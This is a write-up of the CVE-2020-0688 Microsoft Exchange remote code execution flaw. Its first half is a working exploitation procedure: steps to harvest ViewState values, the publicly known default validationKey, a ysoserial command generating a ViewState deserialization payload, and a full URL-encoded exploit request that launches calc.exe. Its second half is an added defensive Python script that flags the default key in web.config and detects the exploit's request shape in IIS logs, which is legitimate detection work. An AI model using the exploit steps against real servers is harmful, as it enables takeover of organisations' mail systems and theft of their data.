# CVE-2020-0688 Microsoft Exchange Server remote code execution vulnerability
==Affected versions==
Exchange 2010, 2013, 2016, 2019
==Exploitation==
1. Obtain the ViewStateUserKey value
/ecp/default.aspx
Press F12 to open the developer tools, switch to the Network tab, then press F5 to resend the request. Locate the response for /ecp/default.aspx (NET_SessionId).
2. Obtain the VIEWSTATEGENERATOR value:
Likewise, in the response for /ecp/default.aspx, simply search for the keyword.
Or use document.getElementById("VIEWSTATEGENERATOR").value
If this field is missing, it is because the system does not have the KB2919355 patch installed; it appears after that patch is applied. Its value is essentially constant, however, so there is no need to retrieve it deliberately.
3. Collect the known parameters
--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF (default; the cause of the vulnerability)
--validationalg = SHA1 (default; the cause of the vulnerability)
--generator = B97B4E27 (essentially always the default)
--viewstateuserkey = d673d1a4-1794-403e-ab96-e283ca880ef2 (obtained manually; variable, differs on every login)
4. Generate the payload:
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="d673d1a4-1794-403e-ab96-e283ca880ef2" --isdebug --islegacy
The payload generated by ysoserial.exe above must be URL-encoded.
Full example:
https://192.168.1.248/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyhAYAAQAAAP%2F%2F%2F%[...]%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BY2FsYy5leGU8L1N5c3RlbTpTdHJpbmc%2BDQogICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291cmNlRGljdGlvbmFyeT4Lp73ado0NJN2PSSnfOoN9h4H7xCU%3D
The calculator pops up, confirming code execution.
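The write-up pins the root cause on a static, publicly known machineKey validationKey and shows the exploit request as a GET to /ecp/default.aspx with __VIEWSTATEGENERATOR and a long __VIEWSTATE in the query string. The following Python script is an added defender-side example, not code from the write-up or from Microsoft: it checks a web.config for the default validationKey quoted above and scans log lines for requests of that shape. The web.config fragment and the log lines are constructed samples; the simplified log layout (date, time, method, URI stem, query string, status) is an assumption, so adapt the field positions to your own IIS log format.

```python
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Static machineKey validationKey that the write-up identifies as the root cause
# (value taken from the write-up itself).
DEFAULT_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"

# Constructed web.config fragment (assumption: a <machineKey> element under
# <system.web>, as in a typical ASP.NET web.config). The key and validation
# algorithm are the defaults named in the write-up; decryptionKey is a placeholder.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
                decryptionKey="PLACEHOLDER-NOT-A-REAL-KEY"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>
"""


def machinekey_findings(web_config_xml):
    """Return one finding string per <machineKey> element in a web.config string.

    A validationKey equal to the well-known default means anyone who knows that
    key can produce a valid ViewState MAC, which is the precondition the
    write-up relies on. Rotating the key to a unique value removes it.
    """
    findings = []
    for mk in ET.fromstring(web_config_xml).iter("machineKey"):
        key = (mk.get("validationKey") or "").upper()
        if key == DEFAULT_VALIDATION_KEY:
            findings.append("validationKey is the known default; rotate it")
        elif key.startswith("AUTOGENERATE"):
            # AutoGenerate keys are per-machine and not publicly known
            findings.append("validationKey is auto-generated")
        else:
            findings.append("validationKey is a custom value")
    return findings


# Constructed log lines in a simplified W3C-style layout (assumption):
# date time cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG_LINES = [
    "2020-02-26 10:00:01 GET /ecp/default.aspx - 200",   # ordinary page load
    "2020-02-26 10:00:05 POST /ecp/default.aspx - 200",  # post-back: ViewState in body
    "2020-02-26 10:02:17 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEy"
    + "A" * 200 + " 200",                                # ViewState in the query string
]


def suspicious_ecp_requests(log_lines, min_viewstate_len=100):
    """Flag GET requests to /ecp/default.aspx whose query string carries both
    __VIEWSTATEGENERATOR and a long __VIEWSTATE, the shape of the write-up's
    full example URL. Normal page loads do not put ViewState in the query string.

    Returns a list of (timestamp, status, viewstate_length) tuples.
    """
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 6:
            continue
        date, time, method, stem, query, status = parts[:6]
        if method != "GET" or not stem.lower().endswith("/ecp/default.aspx"):
            continue
        # "-" is the IIS placeholder for an empty query string
        params = parse_qs(query, keep_blank_values=True) if query != "-" else {}
        viewstate = params.get("__VIEWSTATE", [""])[0]
        if "__VIEWSTATEGENERATOR" in params and len(viewstate) >= min_viewstate_len:
            hits.append((f"{date} {time}", status, len(viewstate)))
    return hits


if __name__ == "__main__":
    for finding in machinekey_findings(SAMPLE_WEB_CONFIG):
        print("web.config:", finding)
    for ts, status, length in suspicious_ecp_requests(SAMPLE_LOG_LINES):
        print(f"log: {ts} status={status} __VIEWSTATE length={length}")
```

The length threshold is a heuristic to separate the base64 gadget payload from trivial query strings; the stronger signal is simply ViewState appearing in a GET query string to the ECP page at all, so lower the threshold if you see false negatives.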